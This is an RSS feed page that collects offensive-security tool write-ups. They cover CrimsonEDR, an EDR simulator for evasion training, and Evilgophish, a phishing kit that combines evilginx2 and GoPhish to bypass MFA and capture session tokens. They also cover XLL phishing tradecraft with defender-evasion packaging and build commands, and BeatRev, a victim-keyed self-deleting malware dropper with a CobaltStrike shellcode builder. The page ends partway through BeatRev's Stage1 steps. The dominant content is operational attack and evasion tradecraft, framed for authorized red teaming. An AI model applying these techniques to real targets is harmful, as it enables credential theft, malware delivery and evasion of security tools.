FreshRSS

๐Ÿ”’
โŒ Secure Planet Training Courses Updated For 2019 - Click Here
There are new available articles, click to refresh the page.
Before yesterdayYour RSS feeds

CrimsonEDR - Simulate The Behavior Of AV/EDR For Malware Development Training

By: Zion3R


CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.


Features

Detection Description
Direct Syscall Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks.
NTDLL Unhooking Identifies attempts to unhook functions within the NTDLL library, a common evasion technique.
AMSI Patch Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis.
ETW Patch Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection.
PE Stomping Identifies instances of PE (Portable Executable) stomping.
Reflective PE Loading Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis.
Unbacked Thread Origin Identifies threads originating from unbacked memory regions, often indicative of malicious activity.
Unbacked Thread Start Address Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection.
API hooking Places a hook on the NtWriteVirtualMemory function to monitor memory modifications.
Custom Pattern Search Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures.

Installation

To get started with CrimsonEDR, follow these steps:

  1. Install dependancy: bash sudo apt-get install gcc-mingw-w64-x86-64
  2. Clone the repository: bash git clone https://github.com/Helixo32/CrimsonEDR
  3. Compile the project: bash cd CrimsonEDR; chmod +x compile.sh; ./compile.sh

โš ๏ธ Warning

Windows Defender and other antivirus programs may flag the DLL as malicious due to its content containing bytes used to verify if the AMSI has been patched. Please ensure to whitelist the DLL or disable your antivirus temporarily when using CrimsonEDR to avoid any interruptions.

Usage

To use CrimsonEDR, follow these steps:

  1. Make sure the ioc.json file is placed in the current directory from which the executable being monitored is launched. For example, if you launch your executable to monitor from C:\Users\admin\, the DLL will look for ioc.json in C:\Users\admin\ioc.json. Currently, ioc.json contains patterns related to msfvenom. You can easily add your own in the following format:
{
"IOC": [
["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
]
}
  1. Execute CrimsonEDRPanel.exe with the following arguments:

    • -d <path_to_dll>: Specifies the path to the CrimsonEDR.dll file.

    • -p <process_id>: Specifies the Process ID (PID) of the target process where you want to inject the DLL.

For example:

.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

Useful Links

Here are some useful resources that helped in the development of this project:

Contact

For questions, feedback, or support, please reach out to me via:



Evilgophish - Evilginx2 + Gophish


Combination of evilginx2 and GoPhish.

Credits

Before I begin, I would like to say that I am in no way bashing Kuba Gretzky and his work. I thank him personally for releasing evilginx2 to the public. In fact, without his work this work would not exist. I must also thank Jordan Wright for developing/maintaining the incredible GoPhish toolkit.

Prerequisites

You should have a fundamental understanding of how to use GoPhish, evilginx2, and Apache2.


Disclaimer

I shall not be responsible or liable for any misuse or illegitimate use of this software. This software is only to be used in authorized penetration testing or red team engagements where the operator(s) has(ve) been given explicit written permission to carry out social engineering.

Why?

As a penetration tester or red teamer, you may have heard of evilginx2 as a proxy man-in-the-middle framework capable of bypassing two-factor/multi-factor authentication. This is enticing to us to say the least, but when trying to use it for social engineering engagements, there are some issues off the bat. I will highlight the two main problems that have been addressed with this project, although some other bugs have been fixed in this version which I will highlight later.

  1. Lack of tracking - evilginx2 does not provide unique tracking statistics per victim (e.g. opened email, clicked link, etc.), this is problematic for clients who want/need/pay for these statistics when signing up for a social engineering engagement.
  2. Session overwriting with NAT and proxying - evilginx2 bases a lot of logic off of remote IP address and will whitelist an IP for 10 minutes after the victim triggers a lure path. evilginx2 will then skip creating a new session for the IP address if it triggers the lure path again (if still in the 10 minute window). This presents issues for us if our victims are behind a firewall all sharing the same public IP address, as the same session within evilginx2 will continue to overwrite with multiple victim's data, leading to missed and lost data. This also presents an issue for our proxy setup, since localhost is the only IP address requesting evilginx2.

Background

In this setup, GoPhish is used to send emails and provide a dashboard for evilginx2 campaign statistics, but it is not used for any landing pages. Your phishing links sent from GoPhish will point to an evilginx2 lure path and evilginx2 will be used for landing pages. This provides the ability to still bypass 2FA/MFA with evilginx2, without losing those precious stats. Apache2 is simply used as a proxy to the local evilginx2 server and an additional hardening layer for your phishing infrastructure. Realtime campaign event notifications have been provided with a local websocket/http server I have developed and full usable JSON strings containing tokens/cookies from evilginx2 are displayed directly in the GoPhish GUI (and feed):

Infrastructure Layout

  • evilginx2 will listen locally on port 8443
  • GoPhish will listen locally on port 8080 and 3333
  • Apache2 will listen on port 443 externally and proxy to local evilginx2 server
    • Requests will be filtered at Apache2 layer based on redirect rules and IP blacklist configuration
      • Redirect functionality for unauthorized requests is still baked into evilginx2 if a request hits the evilginx2 server

setup.sh

setup.sh has been provided to automate the needed configurations for you. Once this script is run and you've fed it the right values, you should be ready to get started. Below is the setup help (note that certificate setup is based on letsencrypt filenames):

Redirect rules have been included to keep unwanted visitors from visiting the phishing server as well as an IP blacklist. The blacklist contains IP addresses/blocks owned by ProofPoint, Microsoft, TrendMicro, etc. Redirect rules will redirect known "bad" remote hostnames as well as User-Agent strings.

replace_rid.sh

In case you ran setup.sh once and already replaced the default RId value throughout the project, replace_rid.sh was created to replace the RId value again.

Usage:
./replace_rid <previous rid> <new rid>
- previous rid - the previous rid value that was replaced
- new rid - the new rid value to replace the previous
Example:
./replace_rid.sh user_id client_id

Email Campaign Setup

Once setup.sh is run, the next steps are:

  1. Start GoPhish and configure email template, email sending profile, and groups
  2. Start evilginx2 and configure phishlet and lure (must specify full path to GoPhish sqlite3 database with -g flag)
  3. Ensure Apache2 server is started
  4. Launch campaign from GoPhish and make the landing URL your lure path for evilginx2 phishlet
  5. PROFIT

SMS Campaign Setup

An entire reworking of GoPhish was performed in order to provide SMS campaign support with Twilio. Your new evilgophish dashboard will look like below:

Once you have run setup.sh, the next steps are:

  1. Configure SMS message template. You will use Text only when creating a SMS message template, and you should not include a tracking link as it will appear in the SMS message. Leave Envelope Sender and Subject blank like below:

  1. Configure SMS Sending Profile. Enter your phone number from Twilio, Account SID, Auth Token, and delay in between messages into the SMS Sending Profiles page:

  1. Import groups. The CSV template values have been kept the same for compatibility, so keep the CSV column names the same and place your target phone numbers into the Email column. Note that Twilio accepts the following phone number formats, so they must be in one of these three:

  1. Start evilginx2 and configure phishlet and lure (must specify full path to GoPhish sqlite3 database with -g flag)
  2. Ensure Apache2 server is started
  3. Launch campaign from GoPhish and make the landing URL your lure path for evilginx2 phishlet
  4. PROFIT

Live Feed Setup

Realtime campaign event notifications are handled by a local websocket/http server and live feed app. To get setup:

  1. Select true for feed bool when running setup.sh

  2. cd into the evilfeed directory and start the app with ./evilfeed

  3. When starting evilginx2, supply the -feed flag to enable the feed. For example:

./evilginx2 -feed -g /opt/evilgophish/gophish/gophish.db

  1. You can begin viewing the live feed at: http://localhost:1337/. The feed dashboard will look like below:

IMPORTANT NOTES

  • The live feed page hooks a websocket for events with JavaScript and you DO NOT need to refresh the page. If you refresh the page, you will LOSE all events up to that point.

Phishlets Surprise

Included in the evilginx2/phishlets folder are three custom phishlets not included in evilginx2.

  1. o3652 - modified/updated version of the original o365 (stolen from Optiv blog)
  2. google - updated from previous examples online (has issues, don't use in live campaigns)
  3. knowbe4 - custom (don't have access to an account for testing auth URL, works for single-factor campaigns, have not fully tested MFA)

A Word About Phishlets

I feel like the world has been lacking some good phishlet examples lately. It would be great if this repository could be a central repository for the latest phishlets. Send me your phishlets at fin3ss3g0d@pm.me for a chance to end up in evilginx2/phishlets. If you provide quality work, I will create a Phishlets Hall of Fame and you will be added to it.

Changes To evilginx2

  1. All IP whitelisting functionality removed, new proxy session is established for every new visitor that triggers a lure path regardless of remote IP
  2. Fixed issue with phishlets not extracting credentials from JSON requests
  3. Further "bad" headers have been removed from responses
  4. Added logic to check if mime type was failed to be retrieved from responses
  5. All X headers relating to evilginx2 have been removed throughout the code (to remove IOCs)

Changes to GoPhish

  1. All X headers relating to GoPhish have been removed throughout the code (to remove IOCs)
  2. Custom 404 page functionality, place a .html file named 404.html in templates folder (example has been provided)
  3. Default rid string in phishing URLs is chosen by the operator in setup.sh
  4. Transparency endpoint and messages completely removed
  5. Added SMS Campaign Support

Changelog

See the CHANGELOG.md file for changes made since the initial release.

Issues and Support

I am taking the same stance as Kuba Gretzky and will not help creating phishlets. There are plenty of examples of working phishlets and for you to create your own, if you open an issue for a phishlet it will be closed. I will also not consider issues with your Apache2, DNS, or certificate setup as legitimate issues and they will be closed. However, if you encounter a legitimate failure/error with the program, I will take the issue seriously.

Future Goals

  • Additions to IP blacklist and redirect rules
  • Add more phishlets

Contributing

I would like to see this project improve and grow over time. If you have improvement ideas, new redirect rules, new IP addresses/blocks to blacklist, phishlets, or suggestions, please email me at: fin3ss3g0d@pm.me or open a pull request.



XLL_Phishing - XLL Phishing Tradecraft


With Microsoft's recent announcement regarding the blocking of macros in documents originating from the internet (email AND web download), attackers have began aggressively exploring other options to achieve user driven access (UDA). There are several considerations to be weighed and balanced when looking for a viable phishing for access method:

  1. Complexity - The more steps that are required on the user's part, the less likely we are to be successful.
  2. Specificity - Are most victim machines susceptible to your attack? Is your attack architecture specific? Does certain software need to be installed?
  3. Delivery - Are there network/policy mitigations in place on the target network that limit how you could deliver your maldoc?
  4. Defenses - Is application whitelisting enforced?
  5. Detection - What kind of AV/EDR is the client running?

These are the major questions, however there are certainly more. Things get more complex as you realize that these factors compound each other; for example, if a client has a web proxy that prohibits the download of executables or DLL's, you may need to stick your payload inside a container (ZIP, ISO, etc). Doing so can present further issues down the road when it comes to detection. More robust defenses require more complex combinations of techniques to defeat.

This article will be written with a fictional target organization in mind; this organization has employed several defensive measures including email filtering rules, blacklisting certain file types from being downloaded, application whitelisting on endpoints, and Microsoft Defender for Endpoint as an EDR solution.

Real organizations may employ none of these, some, or even more defenses which can simplify or complicate the techniques outlined in this research. As always, know your target.


What are XLL's?

XLL's are DLL's, specifically crafted for Microsoft Excel. To the untrained eye they look a lot like normal excel documents.


XLL's provide a very attractive option for UDA given that they are executed by Microsoft Excel, a very commonly encountered software in client networks; as an additional bonus, because they are executed by Excel, our payload will almost assuredly bypass Application Whitelisting rules because a trusted application (Excel) is executing it. XLL's can be written in C, C++, or C# which provides a great deal more flexibility and power (and sanity) than VBA macros which further makes them a desirable choice.

The downside of course is that there are very few legitimate uses for XLL's, so it SHOULD be a very easy box to check for organizations to block the download of that file extension through both email and web download. Sadly many organizations are years behind the curve and as such XLL's stand to be a viable method of phishing for some time.

There are a series of different events that can be used to execute code within an XLL, the most notable of which is xlAutoOpen. The full list may be seen here:


Upon double clicking an XLL, the user is greeted by this screen:


This single dialog box is all that stands between the user and code execution; with fairly thin social engineering, code execution is all but assured.

Something that must be kept in mind is that XLL's, being executables, are architecture specific. This means that you must know your target; the version of Microsoft Office/Excel that the target organization utilizes will (usually) dictate what architecture you need to build your payload for.

There is a pretty clean break in Office versions that can be used as a rule of thumb:

Office 2016 or earlier: x86

Office 2019 or later: x64

It should be noted that it is possible to install the other architecture for each product, however these are the default architectures installed and in most cases this should be a reliable way to make a decision about which architecture to roll your XLL for. Of course depending on the delivery method and pretexting used as part of the phishing campaign, it is possible to provide both versions and rely on the victim to select the appropriate version for their system.

Resources

The XLL payload that was built during this research was based on this project by edparcell. His repository has good instructions on getting started with XLL's in Visual Studio, and I used his code as a starting point to develop a malicious XLL file.

A notable deviation from his repository is that should you wish to create your own XLL project, you will need to download the latest Excel SDK and then follow the instructions on the previously linked repo using this version as opposed to the 2010 version of the SDK mentioned in the README.

Delivery

Delivery of the payload is a serious consideration in context of UDA. There are two primary methods we will focus on:

  1. Email Attachment
  2. Web Delivery

Email Attachment

Either via attaching a file or including a link to a website where a file may be downloaded, email is a critical part of the UDA process. Over the years many organizations (and email providers) have matured and enforced rules to protect users and organizations from malicious attachments. Mileage will vary, but organizations now have the capability to:

  1. Block executable attachments (EXE, DLL, XLL, MZ headers overall)
  2. Block containers like ISO/IMG which are mountable and may contain executable content
  3. Examine zip files and block those containing executable content
  4. Block zip files that are password protected
  5. More

Fuzzing an organization's email rules can be an important part of an engagement, however care must always be taken so as to not tip one's hand that a Red Team operation is ongoing and that information is actively being gathered.

For the purposes of this article, it will be assumed that the target organization has robust email attachment rules that prevent the delivery of an XLL payload. We will pivot and look at web delivery.

Web Delivery

Email will still be used in this attack vector, however rather than sending an attachment it will be used to send a link to a website. Web proxy rules and network mitigations controlling allowed file download types can differ from those enforced in regards to email attachments. For the purposes of this article, it is assumed that the organization prevents the download of executable files (MZ headers) from the web. This being the case, it is worth exploring packers/containers.

The premise is that we might be able to stick our executable inside another file type and smuggle it past the organization's policies. A major consideration here is native support for the file type; 7Z files for example cannot be opened by Windows without installing third party software, so they are not a great choice. Formats like ZIP, ISO, and IMG are attractive choices because they are supported natively by Windows, and as an added bonus they add very few extra steps for the victim.

The organization unfortunately blocks ISO's and IMG's from being downloaded from the web; additionally, because they employ Data Loss Prevention (DLP) users are unable to mount external storage devices, which ISO's and IMG's are considered.

Luckily for us, even though the organization prevents the download of MZ-headered files, it does allow the download of zip files containing executables. These zip files are actively scanned for malware, to include prompting the user for the password for password-protected zip files; however because the executable is zipped it is not blocked by the otherwise blanket deny for MZ files.

Zip files and execution

Zip files were chosen as a container for our XLL payload because:

  1. They are natively compatible with Windows
  2. They are allowed to be downloaded from the internet by the organization
  3. They add very little additional complexity to the attack

Conveniently, double clicking a ZIP file on Windows will open that zip file in File Explorer:

ย 

Less conveniently, double clicking the XLL file from the zipped location triggers Windows Defender; even using the stock project from edparcell that doesn't contain any kind of malicious code.

ย 

Looking at the Windows Defender alert we see it is just a generic "Wacatac" alert:


However there is something odd; the file it identified as malicious was in c:\users\user\Appdata\Local\Temp\Temp1_ZippedXLL.zip, not C:\users\user\Downloads\ZippedXLL\ where we double clicked it. Looking at the Excel instance in ProcessExplorer shows that Excel is actually running the XLL from appdata\local\temp, not from the ZIP file that it came in:

ย 

This appears to be a wrinkle associated with ZIP files, not XLL's. Opening a TXT file from within a zip using notepad also results in the TXT file being copied to appdata\local\temp and opened from there. While opening a text file from this location is fine, Defender seems to identify any sort of actual code execution in this location as malicious.

If a user were to extract the XLL from the ZIP file and then run it, it will execute without any issue; however there is no way to guarantee that a user does this, and we really can't roll the dice on popping AV/EDR should they not extract it. Besides, double clicking the ZIP and then double clicking the XLL is far simpler and a victim is far more prone to complete those simple actions than go to the trouble of extracting the ZIP.

This problem caused me to begin considering a different payload type than XLL; I began exploring VSTO's, which are Visual Studio Templates for Office. I highly encourage you to check out that article.

VSTO's ultimately call a DLL which can either be located locally with the .XLSX that initiates everything, or hosted remotely and downloaded by the .XLSX via http/https. The local option provides no real advantages (and in fact several disadvantages in that there are several more files associated with a VSTO attack), and the remote option unfortunately requires a code signing certificate or for the remote location to be a trusted network. Not having a valid code signing cert, VSTO's do not mitigate any of the issues in this scenario that our XLL payload is running into.

We really seem to be backed into a corner here. Running the XLL itself is fine, however the XLL cannot be delivered by itself to the victim either via email attachment or web download due to organization policy. The XLL needs to be packaged inside a container, however due to DLP formats like ISO, IMG, and VHD are not viable. The victim needs to be able to open the container natively without any third party software, which really leaves ZIP as the option; however as discussed, running the XLL from a zipped folder results in it being copied and ran from appdata\local\temp which flags AV.

I spent many hours brain storming and testing things, going down the VSTO rabbit hole, exploring all conceivable options until I finally decided to try something so dumb it just might work.

This time I created a folder, placed the XLL inside it, and then zipped the folder:

ย 

Clicking into the folder reveals the XLL file:


Double clicking the XLL shows the Add-In prompt from Excel. Note that the XLL is still copied to appdata\local\temp, however there is an additional layer due to the extra folder that we created:

ย 

Clicking enable executes our code without flagging Defender:


Nice! Code execution. Now what?

Tradecraft

The pretexting involved in getting a victim to download and execute the XLL will vary wildly based on the organization and delivery method; themes might include employee salary data, calculators for compensation based on skillset, information on a project, an attendee roster for an event, etc. Whatever the lure, our attack will be a lot more effective if we actually provide the victim with what they have been promised. Without follow through, victims may become suspicious and report the document to their security teams which can quickly give the attacker away and curtail access to the target system.

The XLL by itself will just leave a blank Excel window after our code is done executing; it would be much better for us to provide the Excel Spreadsheet that the victim is looking for.

We can embed our XLSX as a byte array inside the XLL; when the XLL executes, it will drop the XLSX to disk beside the XLL after which it will be opened. We will name the XLSX the same as the XLL, the only difference being the extension.

Given that our XLL is written in C, we can bring in some of the capabilities from a previous writeup I did on Payload Capabilities in C, namely Self-Deletion. Combining these two techniques results in the XLL being deleted from disk, and the XLSX of the same name being dropped in it's place. To the undiscerning eye, it will appear that the XLSX was there the entire time.

Unfortunately the location where the XLL is deleted and the XLSX dropped is the appdata\temp\local folder, not the original ZIP; to address this we can create a second ZIP containing the XLSX alone and also read it into a byte array within the XLL. On execution in addition to the aforementioned actions, the XLL could try and locate the original ZIP file in c:\users\victim\Downloads\ and delete it before dropping the second ZIP containing just the XLSX in it's place. This could of course fail if the user saved the original ZIP in a different location or under a different name, however in many/most cases it should drop in the user's downloads folder automatically.


This screenshot shows in the lower pane the temp folder created in appdata\local\temp containing the XLL and the dropped XLSX, while the top pane shows the original File Explorer window from which the XLL was opened. Notice in the lower pane that the XLL has size 0. This is because it deleted itself during execution, however until the top pane is closed the XLL file will not completely disappear from the appdata\local\temp location. Even if the victim were to click the XLL again, it is now inert and does not really exist.

Similarly, as soon as the victim backs out of the opened ZIP in File Explorer (either by closing it or navigating to a different folder), should they click spreadsheet.zip again they will now find that the test folder contains importantdoc.xlsx; so the XLL has been removed and replaced by the harmless XLSX in both locations that it existed on disk.

This GIF demonstrates the download and execution of the XLL on an MDE trial VM. Note that for some reason Excel opens two instances here; on my home computer it only opened one, so not quite sure why that differs.


Detection

As always, we will ask "What does MDE see?"

A quick screenshot dump to prove that I did execute this on target and catch a beacon back on TestMachine11:



ย 

First off, zero alerts:


What does the timeline/event log capture?


Yikes. Truth be told I have no idea where the keylogging, encrypting, and decrypting credentials alerts are coming from as my code doesn't do any of that. Our actions sure look suspicious when laid out like this, but I will again comment on just how much data is collected by MDE on a single endpoint, let alone hundreds, thousands, or hundreds of thousands that an organization may have hooked into the EDR. So long as we aren't throwing any actual alerts, we are probably ok.

Code Sample

The moment most have probably been waiting for, I am providing a code sample of my developed XLL runner, limited to just those parts discussed here in the Tradecraft section. It will be on the reader to actually get the code into an XLL and implement it in conjunction with the rest of their runner. As always, do no harm, have permission to phish an organization, etc.

Compiling and setup

I have included the source code for a program that will ingest a file and produce hex which can be copied into the byte arrays defined in the snippet. Use this on the the XLSX you wish to present to the user, as well as the ZIP file containing the folder which contains that same XLSX and store them in their respective byte arrays. Compile this code using:

gcc -o ingestfile ingestfile.c

I had some issues getting my XLL's to compile using MingW on a kali machine so thought I would post the commands here:

x64

x86_64-w64-mingw32-gcc snippet.c 2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/x64/XLCALL32.LIB -o importantdoc.xll -s -Os -DUNICODE -shared -I 2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/

x86

i686-w64-mingw32-gcc snippet.c 2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/XLCALL32.LIB -o HelloWorldXll.xll -s -DUNICODE -Os -shared -I 2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/ 

After you compile you will want to make a new folder and copy the XLL into that folder. Then zip it using:

zip -r <myzipname>.zip <foldername>/

Note that in order for the tradecraft outlined in this post to work, you are going to need to match some variables in the code snippet to what you name the XLL and the zip file.

Conclusion

With the dominance of Office Macro's coming to a close, XLL's present an attractive option for phishing campaigns. With some creativity they can be used in conjunction with other techniques to bypass many layers of defenses implemented by organizations and security teams. Thank you for reading and I hope you learned something useful!



BeatRev - POC For Frustrating/Defeating Malware Analysts


BeatRev Version 2

Disclaimer/Liability

The work that follows is a POC to enable malware to "key" itself to a particular victim in order to frustrate efforts of malware analysts.

I assume no responsibility for malicious use of any ideas or code contained within this project. I provide this research to further educate infosec professionals and provide additional training/food for thought for Malware Analysts, Reverse Engineers, and Blue Teamers at large.


TLDR

The first time the malware runs on a victim it AES encrypts the actual payload(an RDLL) using environmental data from that victim. Each subsequent time the malware is ran it gathers that same environmental info, AES decrypts the payload stored as a byte array within the malware, and runs it. If it fails to decrypt/the payload fails to run, the malware deletes itself. Protection against reverse engineers and malware analysts.



Updated 6 JUNE 2022



I didn't feel finished with this project so I went back and did a fairly substantial re-write. The original research and tradecraft may be found Here.

Major changes are as follows:

  1. I have released all source code
  2. I integrated Stephen Fewer's ReflectiveDLL into the project to replace Stage2
  3. I formatted some of the byte arrays in this project into string format and parse them with UuidFromStringA. This Repo was used as a template. This was done to lower entropy of Stage0 and Stage1
  4. Stage0 has had a fair bit of AV evasion built into it. Thanks to Cerbersec's Project Ares for inspiration
  5. The builder application to produce Stage0 has been included

There are quite a few different things that could be taken from the source code of this project for use elsewhere. Hopefully it will be useful for someone.

Problems with Original Release and Mitigations

There were a few shortcomings with the original release of BeatRev that I decided to try and address.

Stage2 was previously a standalone executable that was stored as the alternate data stream(ADS) of Stage1. In order to acheive the AES encryption-by-victim and subsequent decryption and execution, each time Stage1 was ran it would read the ADS, decrypt it, write back to the ADS, call CreateProcess, and then re-encrypt Stage2 and write it back to disk in the ADS. This was a lot of I/O operations and the CreateProcess call of course wasn't great.

I happened to come upon Steven Fewer's research concerning Reflective DLL's and it seemed like a good fit. Stage2 is now an RDLL; our malware/shellcode runner/whatever we want to protect can be ported to RDLL format and stored as a byte array within Stage1 that is then decrypted on runtime and executed by Stage1. This removes all of the I/O operations and the CreateProcess call from Version1 and is a welcome change.

Stage1 did not have any real kind of AV evasion measures programmed in; this was intentional, as it is extra work and wasn't really the point of this research. During the re-write I took it as an added challenge and added API-hashing to remove functions from the Import Address Table of Stage1. This has helped with detection and Stage1 has a 4/66 detection rate on VirusTotal. I was comfortable uploading Stage1 given that is is already keyed to the original box it was ran on and the file signature constantly changes because of the AES encryption that happens.

I recently started paying attention to entropy as a means to detect malware; to try and lower the otherwise very high entropy that a giant AES encrypted binary blob gives an executable I looked into integrating shellcode stored as UUID's. Because the binary is stored in string representation, there is lower overall entropy in the executable. Using this technique The entropy of Stage0 is now ~6.8 and Stage1 ~4.5 (on a max scale of 8).

Finally it is a giant chore to integrate and produce a complete Stage0 due to all of the pieces that must be manipulated. To make this easier I made a builder application that will ingest a Stage0.c template file, a Stage1 stub, a Stage2 stub, and a raw shellcode file (this was build around Stage2 being a shellcode runner containing CobaltStrike shellcode) and produce a compiled Stage0 payload for use on target.

Technical Details

The Reflective DLL code from Stephen Fewer contains some Visual Studio compiler-specific instructions; I'm sure it is possible to port the technique over to MingW but I do not have the skills to do so. The main problem here is that the CobaltStrike shellcode (stageless is ~265K) needs to go inside the RDLL and be compiled. To get around this and integrate it nicely with the rest of the process I wrote my Stage2 RDLL to contain a global variable chunk of memory that is the size of the CS shellcode; this ~265K chunk of memory has a small placeholder in it that can be located in the compiled binary. The code in src/Stage2 has this added already.

Once compiled, this Stage2stub is transfered to kali where a binary patch may be performed to stick the real CS shellcode into the place in memory that it belongs. This produces the complete Stage2.

To avoid the I/O and CreateProcess fiasco previously described, the complete Stage2 must also be patched into the compiled Stage1 by Stage0; this is necessary in order to allow Stage2 to be encrypted once on-target in addition to preventing Stage2 from being stored separately on disk. The same concept previously described for Stage2 is conducted by Stage0 on target in order to assemble the final Stage1 payload. It should be noted that the memmem function is used in order to locate the placeholder within each stub; this function is no available on Windows, so a custom implementation was used. Thanks to Foxik384 for his code.

In order to perform a binary patch, we must allocate the required memory up front; this has a compounding effect, as Stage1 must now be big enough to also contain Stage2. With the added step of converting Stage2 to a UUID string, Stage2 balloons in size as does Stage1 in order to hold it. A stage2 RDLL with a compiled size of ~290K results in a Stage0 payload of ~1.38M, and a Stage1 payload of ~700K.

The builder application only supports creating x64 EXE's. However with a little more work in theory you could make Stage0 a DLL, as well as Stage1, and have the whole lifecycle exist as a DLL hijack instead of a standalone executable.

Instructions

These instructions will get you on your way to using this POC.

  1. Compile Builder using gcc -o builder src/Builder/BeatRevV2Builder.c
  2. Modify sc_length variable in src/Stage2/dll/src/ReflectiveDLL.c to match the length of raw shellcode file used with builder ( I have included fakesc.bin for example)
  3. Compile Stage2 (in visual studio, ReflectiveDLL project uses some VS compiler-specific instructions)
  4. Move compiled stage2stub.dll back to kali, modify src/Stage1/newstage1.c and define stage2size as the size of stage2stub
  5. Compile stage1stub using x86_64-w64-mingw32-gcc newstage1.c -o stage1stub.exe -s -DUNICODE -Os -L /usr/x86_64-w64-mingw32/lib -l:librpcrt4.a
  6. Run builder using syntax: ./builder src/Stage0/newstage0_exe.c x64 stage1stub.exe stage2stub.dll shellcode.bin
  7. Builder will produce dropper.exe. This is a formatted and compiled Stage0 payload for use on target.

BeatRev Original Release

Introduction

About 6 months ago it occured to me that while I had learned and done a lot with malware concerning AV/EDR evasion, I had spent very little time concerned with trying to evade or defeat reverse engineering/malware analysis. This was for a few good reasons:

  1. I don't know anything about malware analysis or reverse engineering
  2. When you are talking about legal, sanctioned Red Team work there isn't really a need to try and frustrate or defeat a reverse engineer because the activity should have been deconflicted long before it reaches that stage.

Nonetheless it was an interesting thought experiment and I had a few colleagues who DO know about malware analysis that I could bounce ideas off of. It seemed a challenge of a whole different magnitude compared to AV/EDR evasion and one I decided to take a stab at.

Premise

My initial premise was that the malware, on the first time of being ran, would somehow "key" itself to that victim machine; any subsequent attempts to run it would evaluate something in the target environment and compare it for a match in the malware. If those two factors matched, it executes as expected. If they do not (as in the case where the sample had been transfered to a malware analysts sandbox), the malware deletes itself (Once again heavily leaning on the work of LloydLabs and his delete-self-poc).

This "key" must be something "unique" to the victim computer. Ideally it will be a combination of several pieces of information, and then further obfuscated. As an example, we could gather the hostname of the computer as well as the amount of RAM installed; these two values can then be concatenated (e.g. Client018192MB) and then hashed using a user-defined function to produce a number (e.g. 5343823956).

There are a ton of choices in what information to gather, but thought should be given as to what values a Blue Teamer could easily spoof; a MAC address for example may seem like an attractive "unique" identifier for a victim, however MAC addresses can easily be set manually in order for a Reverse Engineer to match their sandbox to the original victim. Ideally the values chosen and enumerated will be one that are difficult for a reverse engineer to replicate in their environment.

With some self-deletion magic, the malware could read itself into a buffer, locate a placeholder variable and replace it with this number, delete itself, and then write the modified malware back to disk in the same location. Combined with an if/else statement in Main, the next time the malware runs it will detect that it has been ran previously and then go gather the hostname and amount of RAM again in order to produce the hashed number. This would then be evaluated against the number stored in the malware during the first run (5343823956). If it matches (as is the case if the malware is running on the same machine as it originally did), it executes as expected however if a different value is returned it will again call the self-delete function in order to remove itself from disk and protect the author from the malware analyst.

This seemed like a fine idea in theory until I spoke with a colleague who has real malware analysis and reverse engineering experience. I was told that a reverse engineer would be able to observe the conditional statement in the malware (if ValueFromFirstRun != GetHostnameAndRAM()), and seeing as the expected value is hard-coded on one side of the conditional statement, simply modify the registers to contain the expected value thus completely bypassing the entire protection mechanism.

This new knowledge completely derailed the thought experiment and seeing as I didn't really have a use for a capability like this in the first place, this is where the project stopped for ~6 months.

Overview

This project resurfaced a few times over the intervening 6 months but each time was little more than a passing thought, as I had gained no new knowledge of reversing/malware analysis and again had no need for such a capability. A few days ago the idea rose again and while still neither of those factors have really changed, I guess I had a little bit more knowledge under my belt and couldn't let go of the idea this time.

With the aforementioned problem regarding hard-coding values in mind, I ultimately decided to go for a multi-stage design. I will refer to them as Stage0, Stage1, and Stage2.

Stage0: Setup. Ran on initial infection and deleted afterwards

Stage1: Runner. Ran each subsequent time the malware executes

Stage2: Payload. The malware you care about protecting. Spawns a process and injects shellcode in order to return a Beacon.

Lifecycle

Stage0

Stage0 is the fresh executable delivered to target by the attacker. It contains Stage1 and Stage2 as AES encrypted byte arrays; this is done to protect the malware in transit, or should a defender somehow get their hands on a copy of Stage0 (which shouldn't happen). The AES Key and IV are contained within Stage0 so in reality this won't protect Stage1 or Stage2 from a competent Blue Teamer.

Stage0 performs the following actions:

  1. Sandbox evasion.
  2. Delete itself from disk. It is still running in memory.
  3. Decrypts Stage1 using stored AES Key/IV and writes to disk in place of Stage0.
  4. Gathers the processor name and the Microsoft ProductID.
  5. Hashes this value and then pads it to fit a 16 byte AES key length. This value reversed serves as the AES IV.
  6. Decrypts Stage2 using stored AES Key/IV.
  7. Encrypts Stage2 using new victim-specific AES Key/IV.
  8. Writes Stage2 to disk as an alternate data stream of Stage1.

At the conclusion of this sequence of events, Stage0 exits. Because it was deleted from disk in step 2 and is no longer running in memory, Stage0 is effectively gone; Without prior knowledge of this technique the rest of the malware lifecycle will be a whole lot more confusing than it already is.

In step 4 the processor name and Microsoft ProductID are gathered; the ProductID is retreived from the Registry, and this value can be manually modified which presents and easy opportunity for a Blue Teamer to match their sandbox to the target environment. Depending on what environmental information is gathered this can become easier or more difficult.

Stage1

Stage1 was dropped by Stage0 and exists in the same exact location as Stage0 did (to include the name). Stage2 is stored as an ADS of Stage1. When the attacker/persistence subsequently executes the malware, they are executing Stage1.

Stage1 performs the following actions:

  1. Sandbox evasion.
  2. Gathers the processor name and the Microsoft ProductID.
  3. Hashes this value and then pads it to fit a 16 byte AES key length. This value reversed serves as the AES IV.
